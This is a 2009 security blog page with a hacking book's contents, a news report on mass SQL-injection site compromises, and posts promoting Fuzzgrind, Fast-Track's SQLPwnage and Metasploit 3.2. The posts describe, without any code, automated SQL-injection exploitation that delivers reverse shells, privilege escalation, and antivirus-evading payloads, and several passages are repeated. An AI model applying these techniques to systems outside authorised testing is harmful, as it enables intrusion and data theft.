-Updated Windows attacks and countermeasures, including new Vista and Server 2008 vulnerabilities and Metasploit exploits
-The latest UNIX Trojan and rootkit techniques and dangling pointer and input validation exploits
-New wireless and RFID security tools, including multilayered encryption and gateways
-All-new tracerouting and eavesdropping techniques used to target network hardware and Cisco devices
-Updated DoS, man-in-the-middle, DNS poisoning, and buffer overflow coverage
-VPN and VoIP exploits, including Google and TFTP tricks, SIP flooding, and IPsec hacking
-Fully updated chapters on hacking the Internet user, web hacking, and securing code
Table of contents
Part I: Casing the Establishment
Chapter 1. Footprinting
Chapter 2. Scanning
Chapter 3. Enumeration
Part II: System Hacking
Chapter 4. Hacking Windows
Chapter 5. Hacking Unix
Part III: Infrastructure Hacking
Chapter 6. Remote Connectivityand VoIP Hacking
Chapter 7. Network Devices
Chapter 8. Wireless Hacking
Chapter 9. Hacking Hardware
Part IV: Application and Data Hacking
Chapter 10. Hacking Code
Chapter 11. Web Hacking
Chapter 12. Hacking the Internet User
Part V: Appendixes
Appendix A. Ports
Appendix B. Top 14 Security Vulnerabilities
Appendix C. Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attacks
Index
Auto SQL injection co-opts thousands of sites
An automated attack using SQL injection has compromised tens of thousands of Web pages with code that tries to upload a data-stealing Trojan horse program to visitors' computers, security firm ScanSafe said last week.
The attack, which had inserted iframe scripts into as many as 130,000 Web pages as of Tuesday, uses the compromised pages to attempt to infect visitors with a backdoor Trojan horse that includes keylogging and download functionality, Mary Landesman, senior security researcher for ScanSafe, said in an e-mail interview on Tuesday. The initial Web site compromises appear to have been accomplished through an automated database injection attack, which matches with a trend seen by Landesman and others.
"SQL injection attacks are the most commonly observed compromise vector," Landesman stated. "Web attacks have been growing at the rate of 1 percent per day over the past year, with over half of all observed attacks the result of SQL injection."
Web attacks using SQL injection have become a lot more popular in recent years. Last week, a federal indictment of an alleged data thief stated that all five corporate victims -- including Heartland Payment Systems and Hannaford Bros. -- had initially been compromised through an SQL injection attack. In 2008, about 20 percent of the 5,600 vulnerabilities entered into the National Vulnerability Database were related to SQL injection, according to the service's statistics page.
In the latest spate of attacks, the Trojan horse programs downloaded to compromised computers are poorly recognized by most security software, Landesman said.
"Signature detection ranges, with a high of roughly 50 percent of signature vendors detecting some of the malware and a low of less than 10 percent," she said. "The attackers are continually swapping domains, using multiple exploits, and swapping out the eventual malware binaries to ensure low detection rates from signature-based technologies."
This article from Securityfocus.com
The attack, which had inserted iframe scripts into as many as 130,000 Web pages as of Tuesday, uses the compromised pages to attempt to infect visitors with a backdoor Trojan horse that includes keylogging and download functionality, Mary Landesman, senior security researcher for ScanSafe, said in an e-mail interview on Tuesday. The initial Web site compromises appear to have been accomplished through an automated database injection attack, which matches with a trend seen by Landesman and others.
"SQL injection attacks are the most commonly observed compromise vector," Landesman stated. "Web attacks have been growing at the rate of 1 percent per day over the past year, with over half of all observed attacks the result of SQL injection."
Web attacks using SQL injection have become a lot more popular in recent years. Last week, a federal indictment of an alleged data thief stated that all five corporate victims -- including Heartland Payment Systems and Hannaford Bros. -- had initially been compromised through an SQL injection attack. In 2008, about 20 percent of the 5,600 vulnerabilities entered into the National Vulnerability Database were related to SQL injection, according to the service's statistics page.
In the latest spate of attacks, the Trojan horse programs downloaded to compromised computers are poorly recognized by most security software, Landesman said.
"Signature detection ranges, with a high of roughly 50 percent of signature vendors detecting some of the malware and a low of less than 10 percent," she said. "The attackers are continually swapping domains, using multiple exploits, and swapping out the eventual malware binaries to ensure low detection rates from signature-based technologies."
This article from Securityfocus.com
Friday, July 31, 2009
New security site ... http://triviasecurity.net
http://triviasecurity.net
My friends and I will launch this Trivia Security site next week...I hope you all can participate in this forum ....
http://triviasecurity.net
About Trivia Security:
Trivia Security was born in early 2003 with one goal to make it easier for the whole world and have everything under one site instead of spending hours searching. It was started by FreakXL as DerekDan joined the development process of Trivia Security at Lycos servers and as the development was near to finish in May of 2003 Trivia was moved to new server and a domain `triviasecurity.com` by DerekDan and now `triviasecurity.net`. aMado joined the Trivia Team and has contributed allot in the finishing stages. Without aMado Trivia Security wont be where it is right now.
My friends and I will launch this Trivia Security site next week...I hope you all can participate in this forum ....
http://triviasecurity.net
About Trivia Security:
Trivia Security was born in early 2003 with one goal to make it easier for the whole world and have everything under one site instead of spending hours searching. It was started by FreakXL as DerekDan joined the development process of Trivia Security at Lycos servers and as the development was near to finish in May of 2003 Trivia was moved to new server and a domain `triviasecurity.com` by DerekDan and now `triviasecurity.net`. aMado joined the Trivia Team and has contributed allot in the finishing stages. Without aMado Trivia Security wont be where it is right now.
Monday, July 27, 2009
Fuzzgrind
Fuzzgrind is a fully automatic fuzzing tool, generating test files with the purpose of discovering new execution paths likely to trigger bugs and potentially vulnerabilities.
It is based on the concept of symbolic execution. Thus, the tool starts from a file considered valid by the software under test, and analyses the execution path to extract any constraints tied to branch instructions followed by this software. By resolving constraints one by one, Fuzzgrind will alter the valid file to explore possible new branches of the software under test, in order to discover new vulnerabilities.
Fuzzgrind is licensed under the terms of the GNU GPL. Anybody is welcome to contribute!
It is based on the concept of symbolic execution. Thus, the tool starts from a file considered valid by the software under test, and analyses the execution path to extract any constraints tied to branch instructions followed by this software. By resolving constraints one by one, Fuzzgrind will alter the valid file to explore possible new branches of the software under test, in order to discover new vulnerabilities.
Fuzzgrind is licensed under the terms of the GNU GPL. Anybody is welcome to contribute!
Tuesday, March 24, 2009
FastTrack- Easier Penetration Testing Tool
Every IT professional,security engineer, security analyst and penetration tester are always looking for easier ways to perform penetration tests. I found this Fast-Track tool.
What is Fast-Track?
"Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when I was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of my advanced attacks and propagate it down to my team at SecureState, I ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride. "
I tried one of the powerful tool in Fast-Track, The SQLPwnage.
"This tool scans subnets looking for web servers. After found, it automatically starts to crawl the site looking or post parameters. Once a list of post parameters have been identified, Fast-Track will either try blind SQL injection or error based SQL injection and attempt to automatically exploit the system for you. If successful, whatever payload you specified will be delivered to you, this could be meterpreter, reverse shell, bind shell, reverse vnc, and much more. SQLPwnage will automatically re-enable xp cmdshell if disabled, try to elevate permissions, and use the hex to binary bypass explained in the SQL bruter section to deliver our payloads."
You can see this Video how to use SQLPwnage.
What is Fast-Track?
"Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when I was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of my advanced attacks and propagate it down to my team at SecureState, I ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride. "
I tried one of the powerful tool in Fast-Track, The SQLPwnage.
"This tool scans subnets looking for web servers. After found, it automatically starts to crawl the site looking or post parameters. Once a list of post parameters have been identified, Fast-Track will either try blind SQL injection or error based SQL injection and attempt to automatically exploit the system for you. If successful, whatever payload you specified will be delivered to you, this could be meterpreter, reverse shell, bind shell, reverse vnc, and much more. SQLPwnage will automatically re-enable xp cmdshell if disabled, try to elevate permissions, and use the hex to binary bypass explained in the SQL bruter section to deliver our payloads."
You can see this Video how to use SQLPwnage.
Metasploit 3.2
The Metasploit Framework is a development platform for creating security tools and exploits. It's used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide.
Compare to Metasploit 3.0, in Metasploit 3.2, getting attack code onto a target machine will also be easier on Metasploit 3.2 with improvements to the Raw Packet Tools function. A new library call PacketFu is expected by Moore to achieve packet injection for both wired and wireless end points.It also provides improved support for exploiting multi-core CPU machines, which had been more difficult to attack with previous versions of Metasploit.
Metasploit is also able to take exploit code and weaponize it in an .EXE (executable file) that can be deployed by an attacker. Moore said the EXE template that created EXE attacks has been improved in Metasploit 3.2 in order to defeat AntiVirus vendor signature detection.
If you never try metasploit, you can download it here.
Compare to Metasploit 3.0, in Metasploit 3.2, getting attack code onto a target machine will also be easier on Metasploit 3.2 with improvements to the Raw Packet Tools function. A new library call PacketFu is expected by Moore to achieve packet injection for both wired and wireless end points.It also provides improved support for exploiting multi-core CPU machines, which had been more difficult to attack with previous versions of Metasploit.
Metasploit is also able to take exploit code and weaponize it in an .EXE (executable file) that can be deployed by an attacker. Moore said the EXE template that created EXE attacks has been improved in Metasploit 3.2 in order to defeat AntiVirus vendor signature detection.
If you never try metasploit, you can download it here.
Subscribe to:
Posts (Atom)
Posts
